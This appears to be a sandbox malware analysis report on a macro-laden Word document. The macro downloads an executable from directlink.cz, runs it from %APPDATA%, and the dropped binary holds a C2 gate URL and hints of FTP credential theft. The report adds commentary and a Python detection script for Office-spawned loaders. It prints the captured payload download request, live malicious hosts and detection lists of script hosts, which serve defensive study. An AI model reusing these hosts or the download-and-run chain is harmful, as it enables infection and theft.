"\Sessions\1\BaseNamedObjects\Local\c:!users!4z46j5z!appdata!local!microsoft!windows!history!history.ie5!"
"\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
"\Sessions\1\BaseNamedObjects\Local\c:!users!4z46j5z!appdata!roaming!microsoft!windows!ietldcache!"
"\Sessions\1\BaseNamedObjects\RasPbFile"
"Local\WininetStartupMutex"
"IESQMMUTEX_0_208"
"Local\ZonesCounterMutex" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 68EE0000
- source
- Loaded Module
-
Logged script engine calls
- details
-
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0.CreateObject" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0.createElement" with result: "IDispatch" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0("createElement").dataType" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0("createElement").text" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0("createElement").nodeTypedValue" with result: "WScript.Shell" ...
"WINWORD.EXE" called "WScript.Shell.1.CreateObject" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0("createElement").nodeTypedValue" with result: "GET" ...
"WINWORD.EXE" called "Microsoft.XMLDOM.1.0("createElement").nodeTypedValue" with result: "Microsoft.XMLHTTP" ... - source
- API Call
- relevance
- 10/10
-
Process launched with changed environment
- details
- Process "FXycd.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.C00="4""
- source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- ""cmd /c ""%APPDATA%\Microsoft\FXycd.exe" """ on 2017-7-18.14:18:07.817
- source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
"WINWORD.EXE" searching for class "mspim_wnd32" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "FXycd.exe"
Spawned process "FXycd.exe"
Spawned process "cmd.exe" with commandline ""cmd /c ""%APPDATA%\Microsoft\FXycd.exe" """ - source
- Monitored Target
- relevance
- 3/10
-
-
Installation/Persistence
-
Contains ability to lookup the windows account name
- details
- GetUserNameA@ADVAPI32.DLL from FXycd.exe (PID: 2580)
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Dropped files
- details
-
"6c961004be[1].exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"index.dat" has type "data"
"~WRD0000.tmp" has type "Composite Document File V2 Document Little Endian Os: Windows Version 6.1 Code page: 1252 Author: CNC Template: Normal Last Saved By: CNC Revision Number: 1 Name of Creating Application: Microsoft Office Word Create Time/Date: Tue Jul 18 09:20:00 2017 Last Saved Time/Date: Tue Jul 18 09:20:00 2017 Number of Pages: 2 Number of Words: 0 Number of Characters: 2 Security: 0"
"~WRS{2FFE2C6F-7BB0-41BF-9A99-F06319AADF1E}.tmp" has type "data"
"FXycd.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"3956644.bat" has type "ASCII text with CRLF CR line terminators"
"4z46j5z@directlink[1].txt" has type "ASCII text"
"ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc.lnk" has type "MS Windows shortcut Item id list present Points to a file or directory Has Description string Has Relative path Has command line arguments Archive ctime=Tue Jul 18 20:15:49 2017 mtime=Tue Jul 18 20:15:49 2017 atime=Tue Jul 18 20:15:55 2017 length=657487 window=hide"
"~$106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc" has type "data"
"~WRS{45601108-B7FC-4DB5-8B26-C9E0AF87C01F}.tmp" has type "data"
"ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Tue Jul 18 20:15:49 2017 mtime=Tue Jul 18 20:15:49 2017 atime=Tue Jul 18 20:15:55 2017 length=657487 window=hide"
"~WRS{AD652908-9C61-496B-9567-3F242C37817C}.tmp" has type "data"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Drops executable files
- details
-
"6c961004be[1].exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"FXycd.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows" - source
- Binary File
- relevance
- 10/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "%WINDIR%\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\USER32.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\SETUPAPI.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "%WINDIR%\system32\rsaenh.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45601108-B7FC-4DB5-8B26-C9E0AF87C01F}.tmp"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\MSCTF.dll.mui" - source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://schemas.openxmlformats.org/package/2006/relationships"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/picture"
Pattern match: "http://schemas.openxmlformats.org/schemaLibrary/2006/main"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties"
Pattern match: "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings"
Heuristic match: "vnd.ms"
Pattern match: "http://schemas.openxmlformats.org/markup-compatibility/2006"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/math"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"
Pattern match: "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
Pattern match: "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"
Pattern match: "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
Pattern match: "http://purl.org/dc/elements/1.1/"
Pattern match: "http://purl.org/dc/terms/"
Pattern match: "http://purl.org/dc/dcmitype/"
Pattern match: "http://purl.org/dc/elements/1.1"
Pattern match: "http://purl.org/dc/terms"
Pattern match: "http://purl.org/dc/dcmitype"
Heuristic match: "directlink.cz"
Pattern match: "http://julybazed.pw/engine/gate.php"
Pattern match: "http://www.facebook.com/"
Heuristic match: "\RhinoSoft.com"
Pattern match: "http://www.ibsensoftware.com/"
Pattern match: "cM.qI/67o@}QX|"
Pattern match: "vak9i3ia.oU/paBqHrCwO"
Pattern match: "v.sRDp/C|%,lEAtPsa@L"
Pattern match: "k.IcF/=9@XAIZpq,$a"
Pattern match: "zmZH0.OCD/qO"
Pattern match: "s.mb/2g7m5,6\J},GKRU+Gd8$=q\&+YA%$M^2,p[FNv!Vm\0g!iXx?p}4`|,+B"
Heuristic match: "W4-.la"
Pattern match: "KId.Xo/fS,~"
Pattern match: "v.Zz/^t:,\`c" - source
- File/Memory
- relevance
- 10/10
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
-
"http://www.facebook.com/" (Indicator: "facebook.com")
"myspace1" (Indicator: "myspace") - source
- File/Memory
- relevance
- 7/10
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Unusual Characteristics
-
Reads information about supported languages
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000402")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000403")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000404")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000405")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000406")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000407")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000408")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040A")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040B")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040C")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040E")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040F")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000410")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000411")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000412")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000413")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000414") - source
- Registry Access
- relevance
- 3/10
-
File Details
IMG_065099102.DOC
- Filename
- IMG_065099102.DOC
- Size
- 642KiB (657487 bytes)
- Type
- docx office
- Description
- XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
- Architecture
- WINDOWS
- SHA256
- ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef
- MD5
- 5a0a4fed70d445310150f7cb3fb7e112
- SHA1
- 454a170387cb0ca4dd947ab83acc786f813bbba6
Hybrid Analysis
Analysed 4 processes in total (System Resource Monitor).
- WINWORD.EXE /n "C:\ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc" (PID: 3072)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
directlink.cz | 107.154.161.190 | - | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
107.154.161.190 | 80/TCP | winword.exe (PID: 3072) | United States |
Contacted Countries
United States
HTTP Traffic
Endpoint | Request | URL | Status |
---|---|---|---|
107.154.161.190:80 (directlink.cz) | GET | directlink.cz/download/6c961004be.exe | 200 OK |
Request as captured:
GET /download/6c961004be.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: directlink.cz
Connection: Keep-Alive
The request is attributed to WINWORD.EXE (PID: 3072) itself, which matches the logged Microsoft.XMLHTTP call and the WinINet mutexes created earlier in the report: the macro fetched 6c961004be.exe directly, and the Internet Explorer User-Agent comes from the WinINet stack, not from a browser session. The same file is listed under Extracted Files as 6c961004be[1].exe and, by identical hashes, as the dropped FXycd.exe.
Memory Forensics
String | Context | Stream UID |
---|---|---|
http://julybazed.pw/engine/gate.php | Domain/IP reference | 00020284-00002580-65389-9-0040FB37 |
http://www.facebook.com/ | Domain/IP reference | 00020284-00002580-65389-313-0040A63A |
rhinosoft.com | Domain/IP reference | 00020284-00002580-65389-280-00408D98 |
softx.org | Domain/IP reference | 00020284-00002580-65389-242-0040744A |
2.5.29.37 | Domain/IP reference | 00020284-00002580-65389-372-0040D183 |
These strings were carved from the memory of the dropped FXycd.exe (PID 2580, the second field of each stream UID), not from the document. julybazed.pw/engine/gate.php is a second endpoint, distinct from the download host, and was not contacted during the analysed run. rhinosoft.com and softx.org are FTP client vendor domains, which fits the "Tries to steal FTP credentials" indicator. 2.5.29.37 is not a network address: it is the OID of the X.509 Extended Key Usage extension (id-ce-extKeyUsage), a false positive of the Domain/IP pattern that more plausibly belongs to certificate handling inside the binary.
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 107.154.161.190:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016 | 2022550 |
local -> 107.154.161.190:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Possible Malicious Macro EXE DL AlphaNumL | 2022566 |
107.154.161.190 -> local:55954 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
107.154.161.190 -> local:55954 (TCP) | Misc activity | ET INFO EXE - Served Attached HTTP | 2014520 |
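The two chokepoints in this chain are the process tree (WINWORD.EXE spawning cmd.exe, which launches %APPDATA%\Microsoft\FXycd.exe, from "Spawns new processes" above) and a PE being fetched over HTTP by the Word process, which is what the Suricata alerts fire on. The script below is an added example, not code from the report or from Emerging Threats: it runs both checks over constructed process-creation events and HTTP records shaped like the report's data. The PIDs 3072/2340/2580, the drop path and the request URL are taken from the report; the parent PID of WINWORD.EXE, the benign control events and the record layout are assumptions. The "lowercase alphanumeric .exe name" heuristic is my reading of the AlphaNumL alert name, not the text of ET rule 2022566, and the MZ check mirrors what the PE download policy rule looks for in the response.

```python
"""Detect an Office-spawned loader and the PE download that fed it.

Added example; not the sandbox's or Emerging Threats' code. Events are
constructed to mirror the report: PIDs 3072/2340/2580, the drop path and
the request URL come from the report, everything else is assumed.
"""
import ntpath
import re
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# user-writable locations where a dropped payload typically lands
USER_WRITABLE = re.compile(r"\\(appdata|programdata|temp)\\", re.IGNORECASE)
# assumption: "AlphaNumL" read as a lowercase alphanumeric file name ending in .exe
ALNUM_EXE = re.compile(r"/[a-z0-9]+\.exe$")

# Constructed process-creation events (Sysmon event 1 style).
PROCESS_EVENTS: List[Dict] = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 3072, "ppid": 1000,
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'WINWORD.EXE /n "C:\IMG_065099102.DOC"'},
    {"pid": 2340, "ppid": 3072, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c ""C:\Users\4z46j5z\AppData\Roaming\Microsoft\FXycd.exe" "'},
    {"pid": 2580, "ppid": 2340,
     "image": r"C:\Users\4z46j5z\AppData\Roaming\Microsoft\FXycd.exe",
     "cmdline": r'"C:\Users\4z46j5z\AppData\Roaming\Microsoft\FXycd.exe" '},
    {"pid": 4100, "ppid": 1000, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},  # benign control
]

# Constructed HTTP records; the first mirrors the captured request.
HTTP_RECORDS: List[Dict] = [
    {"method": "GET", "host": "directlink.cz", "uri": "/download/6c961004be.exe",
     "user_agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0)",
     "status": 200, "body_prefix": b"MZ\x90\x00\x03\x00"},
    {"method": "GET", "host": "example.invalid", "uri": "/index.html",
     "user_agent": "Mozilla/5.0", "status": 200,
     "body_prefix": b"<!DOCTYPE html>"},  # benign control
]


def _office_ancestor(event: Dict, by_pid: Dict[int, Dict]) -> str:
    """Return the Office image name found walking up the parent chain, or ''."""
    seen = set()
    parent = by_pid.get(event["ppid"])
    while parent is not None and parent["pid"] not in seen:
        seen.add(parent["pid"])
        name = ntpath.basename(parent["image"]).lower()
        if name in OFFICE_APPS:
            return name
        parent = by_pid.get(parent["ppid"])
    return ""


def office_spawn_alerts(events: List[Dict]) -> List[Dict]:
    """Flag script hosts and user-writable executables descending from Office."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = ntpath.basename(e["image"]).lower()
        if name in OFFICE_APPS:
            continue
        ancestor = _office_ancestor(e, by_pid)
        if not ancestor:
            continue
        if name in SCRIPT_HOSTS:
            reason = f"{ancestor} -> {name}"
        elif USER_WRITABLE.search(e["image"]):
            reason = f"{ancestor} descendant running from user-writable path"
        else:
            continue
        alerts.append({"pid": e["pid"], "image": e["image"], "reason": reason})
    return alerts


def exe_download_alerts(records: List[Dict]) -> List[Dict]:
    """Flag GETs for short alphanumeric .exe names and any PE served in the body."""
    alerts = []
    for r in records:
        reasons = []
        if r["method"] == "GET" and ALNUM_EXE.search(r["uri"]):
            reasons.append("lowercase alphanumeric .exe request")
        if r.get("body_prefix", b"").startswith(b"MZ"):
            reasons.append("PE image in HTTP response")
        if reasons:
            alerts.append({"host": r["host"], "uri": r["uri"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in office_spawn_alerts(PROCESS_EVENTS) + exe_download_alerts(HTTP_RECORDS):
        print(alert)
```

The process check walks the full ancestor chain rather than only the direct parent, so FXycd.exe is caught even though cmd.exe sits between it and Word; the HTTP check fires on the response body independently of the URL, which is why the policy rule still matches when an attacker renames the payload to something less regular.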
Extracted Strings
Extracted Files
Malicious (1)
3956644.bat
- Size
- 94B (94 bytes)
- Type
- text
- Description
- ASCII text, with CRLF, CR line terminators
- AV Scan Result
- Labeled as "Trojan.BAT" (31/80)
- Runtime Process
- cmd.exe (PID: 2340)
- MD5
- 3880eeb1c736d853eb13b44898b718ab
- SHA1
- 4eec9d50360cd815211e3c4e6bdd08271b6ec8e6
- SHA256
- 936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7
-
Informative Selection (1)
FXycd.exe
- Size
- 1012KiB (1035776 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 2d1280909fa3411b113b739ac935b8fc
- SHA1
- a70fb6a3ce12be9dd7907720a74509dbe3b814a6
- SHA256
- de33a8f9b5599dd1c17d2c3487aafe545ee4f9ed6d18ff15f9ff4e3f8ee5c0e4
-
Informative (11)
ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.LNK
- Size
- 733B (733 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jul 18 20:15:49 2017, mtime=Tue Jul 18 20:15:49 2017, atime=Tue Jul 18 20:15:55 2017, length=657487, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- d3fa86ce2962863c289b842842658314
- SHA1
- 09b26adbc89c9abd5ea08eb2e9d7eba9712b78fb
- SHA256
- 016c5a645727e330704e5d69c4e66caec586470bb48ac199475c8ed01c126ef3
-
index.dat
- Size
- 257B (257 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 8e8d460bde666ee844e1b680b633bffc
- SHA1
- c70fad686f9a45a66c70845657dd28c2d1050dfc
- SHA256
- 1f5303c866f3911e2c20b50b8ca6e1e214736b359931a5bf6cd9235a8fa48808
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 5ff6040dd6da452bc183ee5abcdf9ee8
- SHA1
- 83b3f33ad2c8b543ee739f94a8e28be509a07911
- SHA256
- c1539d568c82522a6fdff2acf511cb89f496092c8ccc0b395703a45f345cf027
-
4z46j5z@directlink[1].txt
- Size
- 146B (146 bytes)
- Type
- text
- Description
- ASCII text
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 2f882c0104a6c013b89a6e638423e6a6
- SHA1
- 11dbec780967708bb2d8caf347e28aa5c6f9ca8c
- SHA256
- a062a3be4e58ee39a30ca26031ceadb2c3280d23d748c6a44b436b051074ad03
-
6c961004be[1].exe
- Size
- 1012KiB (1035776 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 2d1280909fa3411b113b739ac935b8fc
- SHA1
- a70fb6a3ce12be9dd7907720a74509dbe3b814a6
- SHA256
- de33a8f9b5599dd1c17d2c3487aafe545ee4f9ed6d18ff15f9ff4e3f8ee5c0e4
-
~WRS{45601108-B7FC-4DB5-8B26-C9E0AF87C01F}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~WRS{AD652908-9C61-496B-9567-3F242C37817C}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 65352dc19fd8213ef55e71778b5deed2
- SHA1
- 42a7bba4eec8a7fbf977ee32e20bc6cba625ef28
- SHA256
- 83c701bdbf76b95b746615793d6436d042a910f90de1e6c2d0736ca5be497009
-
~$106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 5ff6040dd6da452bc183ee5abcdf9ee8
- SHA1
- 83b3f33ad2c8b543ee739f94a8e28be509a07911
- SHA256
- c1539d568c82522a6fdff2acf511cb89f496092c8ccc0b395703a45f345cf027
-
~WRD0000.tmp
- Size
- 424KiB (434176 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: CNC, Template: Normal, Last Saved By: CNC, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jul 18 09:20:00 2017, Last Saved Time/Date: Tue Jul 18 09:20:00 2017, Number of Pages: 2, Number of Words: 0, Number of Characters: 2, Security: 0
- MD5
- e6e2f08267e3a699683f6983f22754df
- SHA1
- 0b90eede5b6db54ac814187221b4bc2201a1f7d4
- SHA256
- 01b3336a2d89925d8d9d020cb8a63469495b8d4f08f8aa58a49c172fc159da13
-
~WRS{2FFE2C6F-7BB0-41BF-9A99-F06319AADF1E}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- 4dccc2000c7cd28966cf0a58334e7870
- SHA1
- caf924828260f7f31f929acd8ba201540cf82de7
- SHA256
- abe3c57c22c2ead595d9c417550408f1c017ad79f49e6e6297938e7bdcdaca45
-
ea106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc.lnk
- Size
- 809B (809 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jul 18 20:15:49 2017, mtime=Tue Jul 18 20:15:49 2017, atime=Tue Jul 18 20:15:55 2017, length=657487, window=hide
- MD5
- 9e7607cdbb700917b7c6be97691b6670
- SHA1
- 6d05118016304f443caf6d5834617c44a9608cee
- SHA256
- 4be95896f0126b33c2e7b7b07f667054ae0cf1f117b8c3595fa2114b66740126
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Extracted file "6c961004be[1].exe" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/de33a8f9b5599dd1c17d2c3487aafe545ee4f9ed6d18ff15f9ff4e3f8ee5c0e4/analysis/1500384372/")
- Extracted file "~$106c66db968ce7d222d48f0da93b96095b423cb608b20b37dc536382e7bcef.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/c1539d568c82522a6fdff2acf511cb89f496092c8ccc0b395703a45f345cf027/analysis/1500384375/")
- Extracted file "~WRD0000.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/01b3336a2d89925d8d9d020cb8a63469495b8d4f08f8aa58a49c172fc159da13/analysis/1500384374/")
- Not all file accesses are visible for cmd.exe (PID: 2340)
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "api-64" are available in the report
- Not all sources for signature ID "mutant-0" are available in the report
- Not all sources for signature ID "registry-25" are available in the report
- Not all sources for signature ID "registry-55" are available in the report
- Not all sources for signature ID "string-18" are available in the report
- Not all sources for signature ID "string-50" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)
- Some low-level data is hidden, as this is only a slim report